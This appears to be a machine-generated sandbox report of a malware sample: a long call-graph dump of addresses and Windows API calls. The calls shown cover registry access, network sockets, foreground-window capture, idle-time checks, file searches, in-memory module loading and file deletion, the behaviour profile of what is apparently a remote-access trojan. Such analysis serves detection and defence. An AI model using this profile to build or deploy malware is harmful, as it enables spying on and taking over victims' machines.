53470 40c8d0 53466->53470 54385 41a75b 29 API calls 53467->54385 53469 41b16b 2 API calls 53468->53469 53473 40c914 53469->53473 53472 40ca03 GetLongPathNameW 53470->53472 53475 403b40 28 API calls 53472->53475 53476 40c918 53473->53476 53477 40c96a 53473->53477 53474 40c8e3 53478 401e18 11 API calls 53474->53478 53479 40ca18 53475->53479 53482 403b40 28 API calls 53476->53482 53481 403b40 28 API calls 53477->53481 53483 40c8ed 53478->53483 53480 403b40 28 API calls 53479->53480 53484 40ca27 53480->53484 53485 40c978 53481->53485 53486 40c926 53482->53486 53488 401e13 11 API calls 53483->53488 54374 40cc37 53484->54374 53491 403b40 28 API calls 53485->53491 53492 403b40 28 API calls 53486->53492 53488->53470 53494 40c98e 53491->53494 53495 40c93c 53492->53495 53493 40ca45 53496 402860 28 API calls 53493->53496 53497 402860 28 API calls 53494->53497 53498 402860 28 API calls 53495->53498 53499 40ca4f 53496->53499 53500 40c999 53497->53500 53501 40c947 53498->53501 53502 401e13 11 API calls 53499->53502 53503 401e18 11 API calls 53500->53503 53504 401e18 11 API calls 53501->53504 53505 40ca59 53502->53505 53506 40c9a4 53503->53506 53507 40c952 53504->53507 53508 401e13 11 API calls 53505->53508 53509 401e13 11 API calls 53506->53509 53510 401e13 11 API calls 53507->53510 53511 40ca62 53508->53511 53512 40c9ad 53509->53512 53513 40c95b 53510->53513 53514 401e13 11 API calls 53511->53514 53515 401e13 11 API calls 53512->53515 53516 401e13 11 API calls 53513->53516 53517 40ca6b 53514->53517 53515->53483 53516->53483 53518 401e13 11 API calls 53517->53518 53519 40ca74 53518->53519 53520 401e13 11 API calls 53519->53520 53521 40ca7d 53520->53521 53521->52994 53522->53007 53523->53029 53525 412683 RegQueryValueExA RegCloseKey 53524->53525 53526 4126a7 53524->53526 53525->53526 53526->52987 53527->53021 53528->53057 53529->53067 53531 401f66 28 API calls 53530->53531 53532 40c86b 53531->53532 53533 41ae18 28 API calls 53532->53533 53534 40c876 53533->53534 53535 40c89e 32 API calls 53534->53535 53536 40c887 53535->53536 53537 401e13 11 API calls 53536->53537 53538 40c890 53537->53538 53539 401eea 11 API calls 53538->53539 53540 40c898 53539->53540 53540->53094 53541->53079 53542->53112 53544 401e0c 53543->53544 53545->52940 53548 40e183 53547->53548 53549 41a66c LoadResource LockResource SizeofResource 53547->53549 53548->53169 53549->53548 53551 401f86 28 API calls 53550->53551 53552 406066 53551->53552 53552->53180 53558 403c30 53553->53558 53556->53201 53557->53182 53559 403c39 53558->53559 53562 403c59 53559->53562 53563 403c68 53562->53563 53568 4032a4 53563->53568 53565 403c74 53566 402325 28 API calls 53565->53566 53567 403b73 53566->53567 53567->53201 53569 4032b0 53568->53569 53570 4032ad 53568->53570 53573 4032b6 22 API calls 53569->53573 53570->53565 53574->53205 53575->53210 53578 402e85 53576->53578 53577 402ea9 53577->53214 53578->53577 53579 402e98 53578->53579 53581 402eae 53578->53581 53583 403445 28 API calls 53579->53583 53581->53577 53584 40225b 11 API calls 53581->53584 53583->53577 53584->53577 53586 404bd0 53585->53586 53589 40245c 53586->53589 53588 404be4 53588->53217 53590 402469 53589->53590 53592 402478 53590->53592 53593 402ad3 28 API calls 53590->53593 53592->53588 53593->53592 53596 4021c6 53594->53596 53595 4021e8 53595->53221 53596->53595 53597 40262e 11 API calls 53596->53597 53597->53595 53599 401e94 53598->53599 53601 41b193 53600->53601 53602 41b178 GetCurrentProcess IsWow64Process 53600->53602 53601->53231 53602->53601 53603 41b18f 53602->53603 53603->53231 53605 412541 RegQueryValueExA RegCloseKey 53604->53605 53606 412569 53604->53606 53605->53606 53607 401f66 28 API calls 53606->53607 53608 41257e 53607->53608 53608->53234 53609->53242 53611 40b02f 53610->53611 53614 40b04b 53611->53614 53613 40b045 53613->53253 53615 40b055 53614->53615 53617 40b060 53615->53617 53618 40b138 28 API calls 53615->53618 53617->53613 53618->53617 53619->53257 53620->53259 53622 40230d 53621->53622 53623 402325 28 API calls 53622->53623 53624 401f80 53623->53624 53624->53001 53641 43a555 53625->53641 53627 43999b 53647 4392ee 35 API calls 2 library calls 53627->53647 53629 439960 53629->53627 53630 439975 53629->53630 53640 43997a ___std_exception_copy 53629->53640 53646 445364 20 API calls _free 53630->53646 53633 4399a7 53634 4399d6 53633->53634 53648 43a59a 39 API calls __Tolower 53633->53648 53637 439a42 53634->53637 53649 43a501 20 API calls 2 library calls 53634->53649 53650 43a501 20 API calls 2 library calls 53637->53650 53638 439b09 _strftime 53638->53640 53651 445364 20 API calls _free 53638->53651 53640->53285 53642 43a55a 53641->53642 53643 43a56d 53641->53643 53652 445364 20 API calls _free 53642->53652 53643->53629 53645 43a55f ___std_exception_copy 53645->53629 53646->53640 53647->53633 53648->53633 53649->53637 53650->53638 53651->53640 53652->53645 53657 401e9b 53653->53657 53655 4027d9 53655->53298 53656->53302 53658 401ea7 53657->53658 53659 40245c 28 API calls 53658->53659 53660 401eb9 53659->53660 53660->53655 53662 409855 53661->53662 53663 4124b7 3 API calls 53662->53663 53664 40985c 53663->53664 53665 409870 53664->53665 53666 40988a 53664->53666 53667 4095cf 53665->53667 53668 409875 53665->53668 53669 4082dc 28 API calls 53666->53669 53667->53052 53680 4082dc 53668->53680 53671 409898 53669->53671 53685 4098a5 85 API calls 53671->53685 53675 409888 53675->53667 53676->53327 53694 402d8b 53677->53694 53679 4028dd 53679->53330 53681 4082eb 53680->53681 53686 408431 53681->53686 53683 408309 53684 409959 29 API calls 53683->53684 53684->53675 53691 40999f 130 API calls 53684->53691 53685->53667 53692 4099b5 53 API calls 53685->53692 53693 4099a9 125 API calls 53685->53693 53688 40843d 53686->53688 53687 40845b 53687->53683 53688->53687 53690 402f0d 28 API calls 53688->53690 53690->53687 53695 402d97 53694->53695 53698 4030f7 53695->53698 53697 402dab 53697->53679 53699 403101 53698->53699 53701 403115 53699->53701 53702 4036c2 28 API calls 53699->53702 53701->53697 53702->53701 53704 403b48 53703->53704 53710 403b7a 53704->53710 53707 403cbb 53719 403dc2 53707->53719 53709 403cc9 53709->53339 53711 403b86 53710->53711 53714 403b9e 53711->53714 53713 403b5a 53713->53707 53715 403ba8 53714->53715 53717 403bb3 53715->53717 53718 403cfd 28 API calls 53715->53718 53717->53713 53718->53717 53720 403dce 53719->53720 53723 402ffd 53720->53723 53722 403de3 53722->53709 53724 40300e 53723->53724 53725 4032a4 22 API calls 53724->53725 53726 40301a 53725->53726 53728 40302e 53726->53728 53729 4035e8 28 API calls 53726->53729 53728->53722 53729->53728 53736 4395ca 53730->53736 53734 412814 53733->53734 53735 4127ed RegSetValueExA RegCloseKey 53733->53735 53734->53365 53735->53734 53739 43954b 53736->53739 53738 401608 53738->53363 53740 43955a 53739->53740 53741 43956e 53739->53741 53745 445364 20 API calls _free 53740->53745 53744 43955f __alldvrm ___std_exception_copy 53741->53744 53746 447611 11 API calls 2 library calls 53741->53746 53744->53738 53745->53744 53746->53744 53748 41aac9 ctype ___scrt_fastfail 53747->53748 53749 401f66 28 API calls 53748->53749 53750 41ab3e 53749->53750 53750->53369 53751->53385 53753 413fb3 getaddrinfo WSASetLastError 53752->53753 53754 413fa9 53752->53754 53753->53444 53908 413e37 29 API calls ___std_exception_copy 53754->53908 53756 413fae 53756->53753 53758 404206 socket 53757->53758 53759 4041fd 53757->53759 53761 404220 53758->53761 53762 404224 CreateEventW 53758->53762 53909 404262 WSAStartup 53759->53909 53761->53444 53762->53444 53763 404202 53763->53758 53763->53761 53765 4049b1 53764->53765 53766 40492a 53764->53766 53765->53444 53767 404933 53766->53767 53768 404987 CreateEventA CreateThread 53766->53768 53769 404942 GetLocalTime 53766->53769 53767->53768 53768->53765 53911 404b1d 53768->53911 53770 41ad56 28 API calls 53769->53770 53771 40495b 53770->53771 53910 404c9e 28 API calls 53771->53910 53773 404968 53774 401f66 28 API calls 53773->53774 53775 404977 53774->53775 53776 41a696 79 API calls 53775->53776 53777 40497c 53776->53777 53778 401eea 11 API calls 53777->53778 53778->53768 53780 4043e1 53779->53780 53781 4042b3 53779->53781 53782 4043e7 WSAGetLastError 53780->53782 53832 404343 53780->53832 53783 4042e8 53781->53783 53786 404cbf 28 API calls 53781->53786 53781->53832 53784 4043f7 53782->53784 53782->53832 53915 420161 27 API calls 53783->53915 53787 4042f7 53784->53787 53788 4043fc 53784->53788 53790 4042d4 53786->53790 53793 401f66 28 API calls 53787->53793 53920 41bc86 30 API calls 53788->53920 53789 4042f0 53789->53787 53792 404306 53789->53792 53794 401f66 28 API calls 53790->53794 53803 404315 53792->53803 53804 40434c 53792->53804 53796 404448 53793->53796 53797 4042e3 53794->53797 53795 40440b 53921 404c9e 28 API calls 53795->53921 53800 401f66 28 API calls 53796->53800 53801 41a696 79 API calls 53797->53801 53799 404418 53802 401f66 28 API calls 53799->53802 53805 404457 53800->53805 53801->53783 53806 404427 53802->53806 53808 401f66 28 API calls 53803->53808 53917 420f44 54 API calls 53804->53917 53809 41a696 79 API calls 53805->53809 53810 41a696 79 API calls 53806->53810 53812 404324 53808->53812 53809->53832 53813 40442c 53810->53813 53811 404354 53814 404389 53811->53814 53815 404359 53811->53815 53816 401f66 28 API calls 53812->53816 53817 401eea 11 API calls 53813->53817 53919 4202fa 28 API calls 53814->53919 53818 401f66 28 API calls 53815->53818 53819 404333 53816->53819 53817->53832 53821 404368 53818->53821 53822 41a696 79 API calls 53819->53822 53825 401f66 28 API calls 53821->53825 53826 404338 53822->53826 53823 404391 53824 4043be CreateEventW CreateEventW 53823->53824 53827 401f66 28 API calls 53823->53827 53824->53832 53828 404377 53825->53828 53916 41dc25 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53826->53916 53829 4043a7 53827->53829 53830 41a696 79 API calls 53828->53830 53833 401f66 28 API calls 53829->53833 53834 40437c 53830->53834 53832->53444 53835 4043b6 53833->53835 53918 4205a2 52 API calls 53834->53918 53837 41a696 79 API calls 53835->53837 53838 4043bb 53837->53838 53838->53824 53922 41a955 GlobalMemoryStatusEx 53839->53922 53841 41a992 53841->53444 53923 413646 53842->53923 53846 440c6d 53845->53846 53961 440a5d 53846->53961 53848 440c8e 53848->53444 53850 40cc0d 53849->53850 53851 41246e 3 API calls 53850->53851 53853 40cc14 53851->53853 53852 40cc2c 53852->53444 53853->53852 53854 4124b7 3 API calls 53853->53854 53854->53852 53856 401f86 28 API calls 53855->53856 53857 41ae13 53856->53857 53857->53444 53859 440c61 20 API calls 53858->53859 53860 41ad77 53859->53860 53861 401f66 28 API calls 53860->53861 53862 41ad85 53861->53862 53862->53444 53863->53444 53865 436060 ___scrt_fastfail 53864->53865 53866 41ac81 GetForegroundWindow GetWindowTextW 53865->53866 53867 403b40 28 API calls 53866->53867 53868 41acab 53867->53868 53868->53444 53870 401f66 28 API calls 53869->53870 53871 40e69e 53870->53871 53871->53444 53872->53444 53873->53444 53874->53444 53876 4027f8 53875->53876 53877 402e78 28 API calls 53876->53877 53878 402814 53877->53878 53878->53444 53880 4045ec 53879->53880 53881 43a89c _Yarn 21 API calls 53880->53881 53883 401f86 28 API calls 53880->53883 53884 404666 53880->53884 53885 401eef 11 API calls 53880->53885 53888 401eea 11 API calls 53880->53888 53966 40455b 53880->53966 53972 404688 53880->53972 53881->53880 53883->53880 53886 4047eb 98 API calls 53884->53886 53885->53880 53887 40466d 53886->53887 53889 401eea 11 API calls 53887->53889 53888->53880 53890 404676 53889->53890 53891 401eea 11 API calls 53890->53891 53892 40467f 53891->53892 53892->53444 53894->53444 53896 404805 SetEvent CloseHandle 53895->53896 53897 40481c closesocket 53895->53897 53898 40489c 53896->53898 53899 404829 53897->53899 53898->53444 53900 40483f 53899->53900 54370 404ab1 83 API calls 53899->54370 53902 404851 WaitForSingleObject 53900->53902 53903 404892 SetEvent CloseHandle 53900->53903 54371 41dc25 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53902->54371 53903->53898 53905 404860 SetEvent WaitForSingleObject 54372 41dc25 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53905->54372 53907 404878 SetEvent CloseHandle CloseHandle 53907->53903 53908->53756 53909->53763 53910->53773 53914 404b29 101 API calls 53911->53914 53913 404b26 53914->53913 53915->53789 53916->53832 53917->53811 53918->53826 53919->53823 53920->53795 53921->53799 53922->53841 53926 413619 53923->53926 53927 41362e ___scrt_initialize_default_local_stdio_options 53926->53927 53930 43e2ed 53927->53930 53933 43b040 53930->53933 53934 43b080 53933->53934 53935 43b068 53933->53935 53934->53935 53936 43b088 53934->53936 53955 445364 20 API calls _free 53935->53955 53956 4392ee 35 API calls 2 library calls 53936->53956 53939 43b098 53957 43b7c6 20 API calls 2 library calls 53939->53957 53942 41363c 53942->53444 53943 43b110 53958 43be34 50 API calls 3 library calls 53943->53958 53946 43b06d ___std_exception_copy 53948 433d3c 53946->53948 53947 43b11b 53959 43b830 20 API calls _free 53947->53959 53949 433d47 IsProcessorFeaturePresent 53948->53949 53950 433d45 53948->53950 53952 4341b4 53949->53952 53950->53942 53960 434178 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53952->53960 53954 434297 53954->53942 53955->53946 53956->53939 53957->53943 53958->53947 53959->53946 53960->53954 53962 440a74 53961->53962 53964 440aab ___std_exception_copy 53962->53964 53965 445364 20 API calls _free 53962->53965 53964->53848 53965->53964 53967 404592 recv 53966->53967 53968 404565 WaitForSingleObject 53966->53968 53970 4045a5 53967->53970 53985 420566 54 API calls 53968->53985 53970->53880 53971 404581 SetEvent 53971->53970 53982 4046a3 53972->53982 53973 4047d8 53974 401eea 11 API calls 53973->53974 53975 4047e1 53974->53975 53975->53880 53976 403b60 28 API calls 53976->53982 53977 401eef 11 API calls 53977->53982 53978 401eea 11 API calls 53978->53982 53979 401ebd 28 API calls 53981 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 53979->53981 53980 401fbd 28 API calls 53980->53982 53981->53982 54285 414b9b 53981->54285 53982->53973 53982->53976 53982->53977 53982->53978 53982->53979 53982->53980 53984 402654 11 API calls 53982->53984 53986 411b60 53982->53986 53984->53982 53985->53971 53987 411b72 53986->53987 53988 403b60 28 API calls 53987->53988 53989 411b85 53988->53989 53990 401fbd 28 API calls 53989->53990 53991 411b94 53990->53991 53992 401fbd 28 API calls 53991->53992 53993 411ba3 53992->53993 53994 41afd3 28 API calls 53993->53994 53995 411bac 53994->53995 53996 411c60 53995->53996 53998 401d64 28 API calls 53995->53998 53997 401d8c 11 API calls 53996->53997 53999 411c69 53997->53999 54000 411bc8 53998->54000 54001 401eea 11 API calls 53999->54001 54002 401fbd 28 API calls 54000->54002 54003 411c72 54001->54003 54004 411bd0 54002->54004 54005 401eea 11 API calls 54003->54005 54006 401d64 28 API calls 54004->54006 54007 411c7a 54005->54007 54008 411be0 54006->54008 54007->53982 54009 401fbd 28 API calls 54008->54009 54010 411be8 54009->54010 54011 401d64 28 API calls 54010->54011 54012 411bf8 54011->54012 54013 401fbd 28 API calls 54012->54013 54014 411c00 54013->54014 54015 401d64 28 API calls 54014->54015 54016 411c10 54015->54016 54017 401fbd 28 API calls 54016->54017 54018 411c18 54017->54018 54019 401d64 28 API calls 54018->54019 54020 411c28 54019->54020 54021 401fbd 28 API calls 54020->54021 54022 411c30 54021->54022 54023 401d64 28 API calls 54022->54023 54024 411c43 54023->54024 54025 401fbd 28 API calls 54024->54025 54026 411c4b 54025->54026 54030 411c81 GetModuleFileNameW 54026->54030 54029 4047eb 98 API calls 54029->53996 54052 411cac 54030->54052 54031 41ab48 42 API calls 54031->54052 54032 40c854 32 API calls 54032->54052 54033 401eea 11 API calls 54033->54052 54034 4176b6 31 API calls 54034->54052 54035 411dea Sleep 54035->54052 54036 403b40 28 API calls 54036->54052 54037 403cbb 28 API calls 54037->54052 54038 403cdc 28 API calls 54038->54052 54039 4028cf 28 API calls 54039->54052 54040 401e13 11 API calls 54040->54052 54041 411e8c Sleep 54041->54052 54042 411f2e Sleep 54042->54052 54043 41b62a 32 API calls 54043->54052 54044 411f90 DeleteFileW 54044->54052 54045 411fc7 DeleteFileW 54045->54052 54046 412019 Sleep 54046->54052 54047 412003 DeleteFileW 54047->54052 54048 412092 54049 401e13 11 API calls 54048->54049 54050 41209e 54049->54050 54051 401e13 11 API calls 54050->54051 54053 4120aa 54051->54053 54052->54031 54052->54032 54052->54033 54052->54034 54052->54035 54052->54036 54052->54037 54052->54038 54052->54039 54052->54040 54052->54041 54052->54042 54052->54043 54052->54044 54052->54045 54052->54046 54052->54047 54052->54048 54056 41205e Sleep 54052->54056 54054 401e13 11 API calls 54053->54054 54055 4120b6 54054->54055 54057 40b027 28 API calls 54055->54057 54058 401e13 11 API calls 54056->54058 54059 4120c9 54057->54059 54063 41206e 54058->54063 54061 401fbd 28 API calls 54059->54061 54060 401e13 11 API calls 54060->54063 54062 4120e9 54061->54062 54172 4123f7 54062->54172 54063->54052 54063->54060 54065 412090 54063->54065 54065->54055 54067 401e13 11 API calls 54068 412100 54067->54068 54069 412125 54068->54069 54070 412274 54068->54070 54184 41aed8 54069->54184 54071 41aed8 28 API calls 54070->54071 54073 41227d 54071->54073 54075 4027ec 28 API calls 54073->54075 54077 4122b2 54075->54077 54076 41ad56 28 API calls 54078 412146 54076->54078 54079 4027cb 28 API calls 54077->54079 54080 4027ec 28 API calls 54078->54080 54081 4122c1 54079->54081 54082 412176 54080->54082 54083 4027cb 28 API calls 54081->54083 54084 4027cb 28 API calls 54082->54084 54085 4122cd 54083->54085 54086 412185 54084->54086 54088 4027cb 28 API calls 54085->54088 54087 4027cb 28 API calls 54086->54087 54090 412194 54087->54090 54089 4122dc 54088->54089 54091 4027cb 28 API calls 54089->54091 54092 4027cb 28 API calls 54090->54092 54093 4122eb 54091->54093 54094 4121a3 54092->54094 54095 4027cb 28 API calls 54093->54095 54096 4027cb 28 API calls 54094->54096 54097 4122fa 54095->54097 54098 4121b2 54096->54098 54099 4027cb 28 API calls 54097->54099 54100 4027cb 28 API calls 54098->54100 54101 412309 54099->54101 54102 4121be 54100->54102 54190 40275c 28 API calls 54101->54190 54104 4027cb 28 API calls 54102->54104 54106 4121ca 54104->54106 54105 412313 54107 404468 61 API calls 54105->54107 54188 40275c 28 API calls 54106->54188 54109 412320 54107->54109 54111 401eea 11 API calls 54109->54111 54110 4121d9 54112 4027cb 28 API calls 54110->54112 54113 41232c 54111->54113 54114 4121e5 54112->54114 54115 401eea 11 API calls 54113->54115 54189 40275c 28 API calls 54114->54189 54117 412338 54115->54117 54120 401eea 11 API calls 54117->54120 54118 4121ef 54119 404468 61 API calls 54118->54119 54122 4121fc 54119->54122 54121 412344 54120->54121 54123 401eea 11 API calls 54121->54123 54124 401eea 11 API calls 54122->54124 54125 412350 54123->54125 54126 412205 54124->54126 54127 401eea 11 API calls 54125->54127 54128 401eea 11 API calls 54126->54128 54129 412359 54127->54129 54130 41220e 54128->54130 54131 401eea 11 API calls 54129->54131 54132 401eea 11 API calls 54130->54132 54133 412362 54131->54133 54134 412217 54132->54134 54135 401eea 11 API calls 54133->54135 54136 401eea 11 API calls 54134->54136 54137 412268 54135->54137 54138 412220 54136->54138 54140 401eea 11 API calls 54137->54140 54139 401eea 11 API calls 54138->54139 54141 41222c 54139->54141 54142 412374 54140->54142 54143 401eea 11 API calls 54141->54143 54144 401e13 11 API calls 54142->54144 54145 412238 54143->54145 54146 412380 54144->54146 54147 401eea 11 API calls 54145->54147 54148 401eea 11 API calls 54146->54148 54149 412244 54147->54149 54151 41238c 54148->54151 54150 401eea 11 API calls 54149->54150 54153 412250 54150->54153 54152 401eea 11 API calls 54151->54152 54154 412398 54152->54154 54155 401eea 11 API calls 54153->54155 54156 401eea 11 API calls 54154->54156 54157 41225c 54155->54157 54158 4123a4 54156->54158 54159 401eea 11 API calls 54157->54159 54160 401eea 11 API calls 54158->54160 54159->54137 54161 4123b0 54160->54161 54162 401eea 11 API calls 54161->54162 54163 4123bc 54162->54163 54164 401eea 11 API calls 54163->54164 54165 4123c8 54164->54165 54166 401eea 11 API calls 54165->54166 54167 4123d4 54166->54167 54168 401eea 11 API calls 54167->54168 54169 4123e0 54168->54169 54170 401eea 11 API calls 54169->54170 54171 411c50 54170->54171 54171->54029 54174 412435 54172->54174 54176 412406 54172->54176 54173 412444 54175 403b40 28 API calls 54173->54175 54174->54173 54194 10001c5b 54174->54194 54178 412450 54175->54178 54191 410b0d 54176->54191 54180 401eea 11 API calls 54178->54180 54182 4120f4 54180->54182 54182->54067 54185 41aee5 54184->54185 54186 401f86 28 API calls 54185->54186 54187 412131 54186->54187 54187->54076 54188->54110 54189->54118 54190->54105 54199 410b19 54191->54199 54195 10001c6b ___scrt_fastfail 54194->54195 54246 100012ee 54195->54246 54197 10001c87 54197->54173 54198 410d8d 22 API calls _Yarn 54198->54174 54230 4105b9 54199->54230 54201 410b38 54202 410b15 54201->54202 54204 4105b9 SetLastError 54201->54204 54217 410c1f SetLastError 54201->54217 54202->54198 54206 410b5f 54204->54206 54205 410bbf GetNativeSystemInfo 54207 410bd6 54205->54207 54206->54202 54206->54205 54206->54206 54206->54217 54207->54217 54233 410abe VirtualAlloc 54207->54233 54209 410bfe 54210 410c26 GetProcessHeap HeapAlloc 54209->54210 54243 410abe VirtualAlloc 54209->54243 54212 410c3d 54210->54212 54213 410c4f 54210->54213 54244 410ad5 VirtualFree 54212->54244 54216 4105b9 SetLastError 54213->54216 54214 410c16 54214->54210 54214->54217 54218 410c98 54216->54218 54217->54202 54219 410d45 54218->54219 54234 410abe VirtualAlloc 54218->54234 54245 410eb0 GetProcessHeap HeapFree 54219->54245 54222 410cb1 ctype 54235 4105cc SetLastError ctype ___scrt_fastfail 54222->54235 54224 410cdd 54224->54219 54236 410975 24 API calls 54224->54236 54226 410d04 54226->54219 54237 410769 54226->54237 54228 410d0f 54228->54202 54228->54219 54229 410d3a SetLastError 54228->54229 54229->54219 54231 4105c8 54230->54231 54232 4105bd SetLastError 54230->54232 54231->54201 54232->54201 54233->54209 54234->54222 54235->54224 54236->54226 54241 410790 54237->54241 54238 4106d3 VirtualProtect 54239 410891 54238->54239 54239->54228 54240 4106d3 VirtualProtect 54240->54241 54241->54239 54241->54240 54242 41087f 54241->54242 54242->54238 54243->54214 54244->54217 54245->54202 54247 10001324 ___scrt_fastfail 54246->54247 54248 100013b7 GetEnvironmentVariableW 54247->54248 54272 100010f1 54248->54272 54251 100010f1 57 API calls 54252 10001465 54251->54252 54253 100010f1 57 API calls 54252->54253 54254 10001479 54253->54254 54255 100010f1 57 API calls 54254->54255 54256 1000148d 54255->54256 54257 100010f1 57 API calls 54256->54257 54258 100014a1 54257->54258 54259 100010f1 57 API calls 54258->54259 54260 100014b5 lstrlenW 54259->54260 54261 100014d2 54260->54261 54262 100014d9 lstrlenW 54260->54262 54261->54197 54263 100010f1 57 API calls 54262->54263 54264 10001501 lstrlenW lstrcatW 54263->54264 54265 100010f1 57 API calls 54264->54265 54266 10001539 lstrlenW lstrcatW 54265->54266 54267 100010f1 57 API calls 54266->54267 54268 1000156b lstrlenW lstrcatW 54267->54268 54269 100010f1 57 API calls 54268->54269 54270 1000159d lstrlenW lstrcatW 54269->54270 54271 100010f1 57 API calls 54270->54271 54271->54261 54273 10001118 ___scrt_fastfail 54272->54273 54274 10001129 lstrlenW 54273->54274 54275 10002c40 ___scrt_fastfail 54274->54275 54276 10001148 lstrcatW lstrlenW 54275->54276 54277 10001177 lstrlenW FindFirstFileW 54276->54277 54278 10001168 lstrlenW 54276->54278 54279 100011a0 54277->54279 54280 100011e1 54277->54280 54278->54277 54281 100011c7 FindNextFileW 54279->54281 54284 100011aa 54279->54284 54280->54251 54281->54279 54283 100011da FindClose 54281->54283 54282 10001000 49 API calls 54282->54284 54283->54280 54284->54281 54284->54282 54286 401fbd 28 API calls 54285->54286 54287 414bbd SetEvent 54286->54287 54288 414bd2 54287->54288 54289 403b60 28 API calls 54288->54289 54290 414bec 54289->54290 54291 401fbd 28 API calls 54290->54291 54292 414bfc 54291->54292 54293 401fbd 28 API calls 54292->54293 54294 414c0e 54293->54294 54295 41afd3 28 API calls 54294->54295 54296 414c17 54295->54296 54298 414d99 54296->54298 54299 414c37 GetTickCount 54296->54299 54362 414d8a 54296->54362 54297 401d8c 11 API calls 54300 4161fb 54297->54300 54298->54362 54363 414dad 54298->54363 54301 41ad56 28 API calls 54299->54301 54302 401eea 11 API calls 54300->54302 54303 414c4d 54301->54303 54305 416207 54302->54305 54364 41acb0 GetLastInputInfo GetTickCount 54303->54364 54307 401eea 11 API calls 54305->54307 54309 416213 54307->54309 54308 414c54 54310 41ad56 28 API calls 54308->54310 54311 414c5f 54310->54311 54312 41ac62 30 API calls 54311->54312 54313 414c6d 54312->54313 54314 41aed8 28 API calls 54313->54314 54315 414c7b 54314->54315 54316 401d64 28 API calls 54315->54316 54317 414c89 54316->54317 54318 4027ec 28 API calls 54317->54318 54319 414c97 54318->54319 54365 40275c 28 API calls 54319->54365 54321 414ca6 54322 4027cb 28 API calls 54321->54322 54323 414cb5 54322->54323 54366 40275c 28 API calls 54323->54366 54325 414cc4 54326 4027cb 28 API calls 54325->54326 54327 414cd0 54326->54327 54367 40275c 28 API calls 54327->54367 54329 414cda 54330 404468 61 API calls 54329->54330 54331 414ce9 54330->54331 54332 401eea 11 API calls 54331->54332 54333 414cf2 54332->54333 54334 401eea 11 API calls 54333->54334 54335 414cfe 54334->54335 54336 401eea 11 API calls 54335->54336 54337 414d0a 54336->54337 54338 401eea 11 API calls 54337->54338 54339 414d16 54338->54339 54340 401eea 11 API calls 54339->54340 54341 414d22 54340->54341 54342 401eea 11 API calls 54341->54342 54343 414d2e 54342->54343 54344 401e13 11 API calls 54343->54344 54345 414d3a 54344->54345 54346 401eea 11 API calls 54345->54346 54347 414d43 54346->54347 54348 401eea 11 API calls 54347->54348 54349 414d4c 54348->54349 54350 401d64 28 API calls 54349->54350 54351 414d57 54350->54351 54352 43a5f7 _strftime 39 API calls 54351->54352 54353 414d64 54352->54353 54354 414d69 54353->54354 54355 414d8f 54353->54355 54357 414d82 54354->54357 54358 414d77 54354->54358 54356 401d64 28 API calls 54355->54356 54356->54298 54360 404915 104 API calls 54357->54360 54368 4049ba 81 API calls 54358->54368 54360->54362 54361 414d7d 54361->54362 54362->54297 54369 404ab1 83 API calls 54363->54369 54364->54308 54365->54321 54366->54325 54367->54329 54368->54361 54369->54361 54370->53900 54371->53905 54372->53907 54375 40cc3f 54374->54375 54376 403b9e 28 API calls 54375->54376 54377 40ca3a 54376->54377 54378 402860 54377->54378 54382 40286f 54378->54382 54379 4028b1 54387 402daf 54379->54387 54381 4028af 54381->53493 54382->54379 54383 4028a6 54382->54383 54386 402d68 28 API calls 54383->54386 54385->53474 54386->54381 54388 402dbb 54387->54388 54389 4030f7 28 API calls 54388->54389 54390 402dcd 54389->54390 54390->54381 54393 40e56a 54391->54393 54392 4124b7 3 API calls 54392->54393 54393->54392 54394 40e60e 54393->54394 54396 40e5fe Sleep 54393->54396 54413 40e59c 54393->54413 54397 4082dc 28 API calls 54394->54397 54395 4082dc 28 API calls 54395->54413 54396->54393 54400 40e619 54397->54400 54399 41ae18 28 API calls 54399->54413 54401 41ae18 28 API calls 54400->54401 54402 40e625 54401->54402 54426 412774 14 API calls 54402->54426 54405 401e13 11 API calls 54405->54413 54406 40e638 54407 401e13 11 API calls 54406->54407 54409 40e644 54407->54409 54408 401f66 28 API calls 54408->54413 54410 401f66 28 API calls 54409->54410 54411 40e655 54410->54411 54414 4126d2 14 API calls 54411->54414 54412 4126d2 14 API calls 54412->54413 54413->54395 54413->54396 54413->54399 54413->54405 54413->54408 54413->54412 54424 40bf04 73 API calls ___scrt_fastfail 54413->54424 54425 412774 14 API calls 54413->54425 54415 40e668 54414->54415 54427 411699 TerminateProcess WaitForSingleObject 54415->54427 54417 40e670 ExitProcess 54428 411637 62 API calls 54421->54428 54425->54413 54426->54406 54427->54417 54429 41569e 54430 401d64 28 API calls 54429->54430 54431 4156b3 54430->54431 54432 401fbd 28 API calls 54431->54432 54433 4156bb 54432->54433 54434 401d64 28 API calls 54433->54434 54435 4156cb 54434->54435 54436 401fbd 28 API calls 54435->54436 54437 4156d3 54436->54437 54440 411aed 54437->54440 54441 4041f1 3 API calls 54440->54441 54442 411b01 54441->54442 54443 40428c 97 API calls 54442->54443 54444 411b09 54443->54444 54445 4027ec 28 API calls 54444->54445 54446 411b22 54445->54446 54447 4027cb 28 API calls 54446->54447 54448 411b2c 54447->54448 54449 404468 61 API calls 54448->54449 54450 411b36 54449->54450 54451 401eea 11 API calls 54450->54451 54452 411b3e 54451->54452 54453 4045d5 261 API calls 54452->54453 54454 411b4c 54453->54454 54455 401eea 11 API calls 54454->54455 54456 411b54 54455->54456 54457 401eea 11 API calls 54456->54457 54458 411b5c 54457->54458

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD54
